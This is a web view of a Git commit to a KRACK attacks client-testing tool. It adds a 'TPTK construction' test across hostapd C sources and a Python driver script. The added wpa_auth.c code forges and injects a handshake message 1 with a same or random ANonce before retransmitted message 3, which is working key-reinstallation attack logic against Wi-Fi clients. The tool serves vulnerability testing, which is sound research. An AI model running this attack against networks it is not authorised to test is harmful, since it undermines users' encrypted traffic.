Home Explore Help
Register Sign In
wareck
/
krackattacks
1
0
Fork 0
Files Issues 0 Pull Requests 0 Wiki
Browse Source

krackattack: test for TPTK construction

Mathy 7 years ago
parent
019c323670
commit
fd4ba9389b
4 changed files with 80 additions and 10 deletions
Split View Show Diff Stats
  1. 4 0
      hostapd/ctrl_iface.c
  2. 35 5
      krackattack/krack-test-client.py
  3. 37 5
      src/ap/wpa_auth.c
  4. 4 0
      src/ap/wpa_auth.h

+ 4 - 0
hostapd/ctrl_iface.c
View File 

@@ -2579,6 +2579,10 @@ static int hostapd_ctrl_iface_receive_process(struct hostapd_data *hapd,
 
 		reply_len = hostapd_ctrl_driver_flags(hapd->iface, reply,
 
 						      reply_size);
 
 #ifdef KRACK_TEST_CLIENT
 
+	} else if (os_strcmp(buf, "TEST_TPTK") == 0) {
 
+		poc_test_tptk_construction(hapd->wpa_auth, TEST_TPTK_REPLAY);
 
+	} else if (os_strcmp(buf, "TEST_TPTK_RAND") == 0) {
 
+		poc_test_tptk_construction(hapd->wpa_auth, TEST_TPTK_RAND);
 
 	} else if (os_strcmp(buf, "START_GROUP_TESTS") == 0) {
 
 		poc_start_testing_group_handshake(hapd->wpa_auth);
 
 	} else if (os_strncmp(buf, "GET_TK ", 7) == 0) {

+ 35 - 5
krackattack/krack-test-client.py
View File 

@@ -242,7 +242,7 @@ class ClientState():
 
 	UNKNOWN, VULNERABLE, PATCHED = range(3)
 
 	IDLE, STARTED, GOT_CANARY, FINISHED = range(4)
 
 
-	def __init__(self, clientmac, test_group_hs=False):
 
+	def __init__(self, clientmac, test_group_hs=False, test_tptk=False):
 
 		self.mac = clientmac
 
 		self.TK = None
 
 		self.vuln_4way = ClientState.UNKNOWN
 
@@ -252,6 +252,7 @@ class ClientState():
 
 		self.ivs = dict() # maps IV values to IvInfo objects
 
 		self.pairkey_sent_time_prev_iv = None
 
 		self.pairkey_intervals_no_iv_reuse = 0
 
+		self.pairkey_tptk = test_tptk
 
 
 		self.groupkey_reset()
 
 		self.groupkey_grouphs = test_group_hs
 
@@ -344,7 +345,16 @@ class ClientState():
 
 			# We wait for enough such intervals to occur, to avoid getting a wrong result.
 
 			if self.pairkey_intervals_no_iv_reuse >= 5 and self.vuln_4way == ClientState.UNKNOWN:
 
 				self.vuln_4way = ClientState.PATCHED
 
-				log(INFO, "%s: client DOESN'T seem vulnerable to pairwise key reinstallation in the 4-way handshake." % self.mac, color="green")
 
+
 
+				# Be sure to clarify *which* type of attack failed (to remind user to test others attacks as well)
 
+				msg = "%s: client DOESN'T seem vulnerable to pairwise key reinstallation in the 4-way handshake"
 
+				if self.pairkey_tptk == KRAckAttackClient.TPTK_NONE:
 
+					msg += " (using standard attack)"
 
+				elif self.pairkey_tptk == KRAckAttackClient.TPTK_REPLAY:
 
+					msg += " (using TPTK attack)"
 
+				elif self.pairkey_tptk == KRAckAttackClient.TPTK_RAND:
 
+					msg += " (using TPTK-RAND attack)"
 
+				log(INFO, (msg + ".") % self.mac, color="green")
 
 
 	def groupkey_handle_canary(self, p):
 
 		"""Handle replies to the replayed ARP broadcast request (which reuses an IV)"""
 
@@ -408,10 +418,13 @@ class ClientState():
 
 		log(DEBUG, "%s: sent %d broadcasts ARPs this interval" % (self.mac, self.groupkey_requests_sent))
 
 
 class KRAckAttackClient():
 
+	TPTK_NONE, TPTK_REPLAY, TPTK_RAND = range(3)
 
+
 
 	def __init__(self, interface):
 
 		self.nic_iface = interface
 
 		self.nic_mon = interface + "mon"
 
 		self.test_grouphs = False
 
+		self.test_tptk = KRAckAttackClient.TPTK_NONE
 
 		try:
 
 			self.apmac = scapy.arch.get_if_hwaddr(interface)
 
 		except:
 
@@ -487,7 +500,7 @@ class KRAckAttackClient():
 
 		# Inspect encrypt frames for IV reuse & handle replayed frames rejected by the kernel
 
 		elif p.addr1 == self.apmac and Dot11WEP in p:
 
 			if not clientmac in self.clients:
 
-				self.clients[clientmac] = ClientState(clientmac, test_group_hs=self.test_grouphs)
 
+				self.clients[clientmac] = ClientState(clientmac, test_group_hs=self.test_grouphs, test_tptk=self.test_tptk)
 
 			client = self.clients[clientmac]
 
 
 			iv = dot11_get_iv(p)
 
@@ -533,7 +546,7 @@ class KRAckAttackClient():
 
 		subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
 
 		subprocess.check_output(["ifconfig", self.nic_mon, "up"])
 
 
-	def run(self, test_grouphs=False):
 
+	def run(self, test_grouphs=False, test_tptk=False):
 
 		self.configure_interfaces()
 
 
 		# Open the patched hostapd instance that carries out tests and let it start
 
@@ -569,7 +582,14 @@ class KRAckAttackClient():
 
 		# If applicable, inform hostapd that we are testing the group key handshake
 
 		if test_grouphs:
 
 			self.hostapd_ctrl.request("START_GROUP_TESTS")
 
+
 
 			self.test_grouphs = True
 
+		# If applicable, inform hostapd that we are testing for Temporal PTK (TPTK) construction behaviour
 
+		self.test_tptk = test_tptk
 
+		if self.test_tptk == KRAckAttackClient.TPTK_REPLAY:
 
+			self.hostapd_ctrl.request("TEST_TPTK")
 
+		elif self.test_tptk == KRAckAttackClient.TPTK_RAND:
 
+			self.hostapd_ctrl.request("TEST_TPTK_RAND")
 
 
 		log(STATUS, "Ready. Connect to this Access Point to start the tests. Make sure the client requests an IP using DHCP!", color="green")
 
 
@@ -649,9 +669,19 @@ if __name__ == "__main__":
 
 		quit(1)
 
 
 	test_grouphs = argv_pop_argument("--group")
 
+	test_tptk_replay = argv_pop_argument("--tptk")
 
+	test_tptk_rand = argv_pop_argument("--tptk-rand")
 
 	while argv_pop_argument("--debug"):
 
 		global_log_level -= 1
 
 
+	test_tptk = KRAckAttackClient.TPTK_NONE
 
+	if test_tptk_replay and test_tptk_rand:
 
+		log(ERROR, "Please only specify --tptk or --tptk-rand")
 
+	elif test_tptk_replay:
 
+		test_tptk = KRAckAttackClient.TPTK_REPLAY
 
+	elif test_tptk_rand:
 
+		test_tptk = KRAckAttackClient.TPTK_RAND
 
+
 
 	try:
 
 		interface = hostapd_read_config("hostapd.conf")
 
 	except Exception as ex:
 
@@ -663,4 +693,4 @@ if __name__ == "__main__":
 
 
 	attack = KRAckAttackClient(interface)
 
 	atexit.register(cleanup)
 
-	attack.run(test_grouphs=test_grouphs)
 
+	attack.run(test_grouphs=test_grouphs, test_tptk=test_tptk)

+ 37 - 5
src/ap/wpa_auth.c
View File 

@@ -78,6 +78,7 @@ static const int dot11RSNAConfigSATimeout = 60;
 
 #define TEST_4WAY	1
 
 #define TEST_GROUP	2
 
 int poc_testing_handshake = TEST_4WAY;
 
+int poc_testing_tptk_construction = TEST_TPTK_NONE;
 
 #endif
 
 
 static inline int wpa_auth_mic_failure_report(
 
@@ -344,6 +345,11 @@ void poc_start_testing_group_handshake(struct wpa_authenticator *wpa_auth)
 
 	poc_testing_handshake = TEST_GROUP;
 
 	poc_log(NULL, "starting group key handshake tests\n");
 
 }
 
+
 
+void poc_test_tptk_construction(struct wpa_authenticator *wpa_auth, int test_type)
 
+{
 
+	poc_testing_tptk_construction = test_type;
 
+}
 
 #endif
 
 
 
@@ -1167,8 +1173,9 @@ continue_processing:
 
 		     sm->wpa_ptk_state != WPA_PTK_PTKINITNEGOTIATING)) {
 
 			wpa_auth_vlogger(wpa_auth, sm->addr, LOGGER_INFO,
 
 					 "received EAPOL-Key msg 2/4 in "
 
-					 "invalid state (%d) - dropped",
 
-					 sm->wpa_ptk_state);
 
+					 "invalid state (%d) - dropped - MIC %d",
 
+					 sm->wpa_ptk_state,
 
+					 wpa_verify_key_mic(sm->wpa_key_mgmt, &sm->PTK, data, data_len));
 
 			return;
 
 		}
 
 		random_add_randomness(key->key_nonce, WPA_NONCE_LEN);
 
@@ -2297,9 +2304,34 @@ SM_STATE(WPA_PTK, PTKINITNEGOTIATING)
 
 		sm->pairwise_set = TRUE;
 
 	}
 
 
-	// Reset transmit packet number of the group key, so we can detect if clients
 
-	// will accept re-used packet numbers (IVs) in broadcast data frames. Debug
 
-	// output is printed below.
 
+	// When testing for Temporal TPK construction (e.g. wpa_supplicant 2.6 attack), forge a message 1
 
+	// with the current and a random ANonce before retransmitted message 3's.
 
+	if (sm->TimeoutCtr > 1 && poc_testing_tptk_construction != TEST_TPTK_NONE) {
 
+		u8 replay_counter[WPA_REPLAY_COUNTER_LEN];
 
+		u8 random_anonce[WPA_NONCE_LEN];
 
+		u8 *anonce = NULL;
 
+
 
+		memcpy(replay_counter, sm->key_replay[0].counter, WPA_REPLAY_COUNTER_LEN);
 
+		random_get_bytes(random_anonce, WPA_NONCE_LEN);
 
+
 
+		// Note: this message 1 is sent using link-layer encryption. This is what we want.
 
+		// In practice an implementation may accept plaintext message 1's due to race conditions,
 
+		// were we just send it encrypted so we simulate always winning these race conditions.
 
+		poc_log(sm->addr, "Injecting Msg1 (%s) before Msg3 to test TPTK construction attack\n",
 
+			poc_testing_tptk_construction == TEST_TPTK_RAND ? "with random ANonce" : "with same ANonce");
 
+
 
+		anonce = poc_testing_tptk_construction == TEST_TPTK_RAND ? random_anonce : sm->ANonce;
 
+		__wpa_send_eapol(sm->wpa_auth, sm,
 
+			 WPA_KEY_INFO_ACK | WPA_KEY_INFO_KEY_TYPE, NULL,
 
+			 anonce, NULL, 0, 0, 0, 0);
 
+
 
+		// The replay counter should not be modified when sending the forged Msg1
 
+		memcpy(sm->key_replay[0].counter, replay_counter, WPA_REPLAY_COUNTER_LEN);
 
+	}
 
+
 
+	// Reset transmit packet number of the group key used by the kernel/driver, so
 
+	// we can detect if clients will accept re-used packet numbers (IVs) in broadcast
 
+	// data frames. Debug output is printed below.
 
 	wpa_group_config_group_keys(sm->wpa_auth, sm->group);
 
 #endif

+ 4 - 0
src/ap/wpa_auth.h
View File 

@@ -349,7 +349,11 @@ int wpa_auth_ensure_group(struct wpa_authenticator *wpa_auth, int vlan_id);
 
 int wpa_auth_release_group(struct wpa_authenticator *wpa_auth, int vlan_id);
 
 
 #ifdef KRACK_TEST_CLIENT
 
+#define TEST_TPTK_NONE		0
 
+#define TEST_TPTK_REPLAY	1
 
+#define TEST_TPTK_RAND		2
 
 void poc_start_testing_group_handshake(struct wpa_authenticator *wpa_auth);
 
+void poc_test_tptk_construction(struct wpa_authenticator *wpa_auth, int test_type);
 
 #endif
 
 
 #endif /* WPA_AUTH_H */